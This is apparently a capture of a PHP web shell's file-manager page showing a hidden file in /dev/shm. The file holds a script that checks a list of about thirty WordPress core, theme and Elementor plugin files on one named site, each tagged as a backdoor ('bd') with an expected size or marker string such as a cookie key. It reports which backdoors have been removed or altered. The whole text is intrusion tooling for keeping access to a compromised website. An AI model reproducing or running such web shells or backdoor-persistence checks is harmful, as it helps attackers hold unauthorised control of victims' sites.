D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.symbol
back
Copy
<?php $r = '/home/nikonnnd/vasilxega.com'; $x = ["/wp-load.php"=>"bd@@244485196@@restore_state", "/wp-admin/revision.php"=>"bd@@244538117@@reverse_lookup", "/wp-admin/network/plugin-install.php"=>"bd@@244530440@@$_COOKIE[8", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/ratecategory.php"=>"bd@@244538122@@2442", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Sandbox/research_buttons.php"=>"bd@@244538124@@1969", "/wp-content/themes/twentytwentyfour/patterns/cta-services-image-left.php"=>"bd@@245126157@@3582", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Cache/calendarjs.php"=>"bd@@244538126@@632", "/wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/responses/lock.error.response.php"=>"bd@@244538128@@1596", "/wp-content/plugins/elementor/app/modules/import-export-customization/runners/import/site.content.php"=>"bd@@244538130@@1971", "/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php"=>"bd@@244530457@@78", "/wp-content/plugins/elementor/core/common/modules/finder/categories/customer_rec.php"=>"bd@@244530476@@1983", "/wp-content/plugins/elementor/modules/variables/services/batch-operations/batch.processor.formatter.php"=>"bd@@244530485@@584", "/wp-includes/customize/class-wp-customize-code-editor-control.php"=>"bd@@244444215@@framework", "/wp-admin/network/index.php"=>"bd@@244685631@@3525", "/wp-includes/widgets/class-wp-widget-meta.php"=>"bd@@244935238@@4824", "/index.php"=>"bd@@245156166@@405", "/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php"=>"bd@@244476758@@config_manager", "/fine.php"=>"bd@@244426584@@960", "/wp-content/plugins/elementor-pro/modules/forms/submissions/database/menu5.php"=>"bd@@244530523@@630", "/health.php"=>"bd@@244426588@@699", "/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/import-export/traits/external.attachment.trait.php"=>"bd@@244485726@@644", "/wp-content/plugins/elementor-pro/core/app/modules/import-export-customization/BoolToCSS.php"=>"bd@@244530528@@566", "/param.php"=>"bd@@244426592@@751", "/wp-content/plugins/elementor-pro/assets/js/packages/editor-documents-extended/editor.documents.extended.asset.php"=>"bd@@244530530@@560", "/wp-includes/fonts/class-wp-font-library.php"=>"bd@@244485475@@event_handler", "/wp-content/plugins/elementor-pro/modules/forms/submissions/database/entities/form.snapshot.php"=>"bd@@244485731@@563", "/wp-includes/sodium_compat/src/Core/Ed25519.php"=>"bd@@245346147@@18504", "/wp-content/plugins/under-construction-page/themes/bulldozer/index.php"=>"bd@@245360227@@2069", "/style.php"=>"bd@@244426600@@827"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');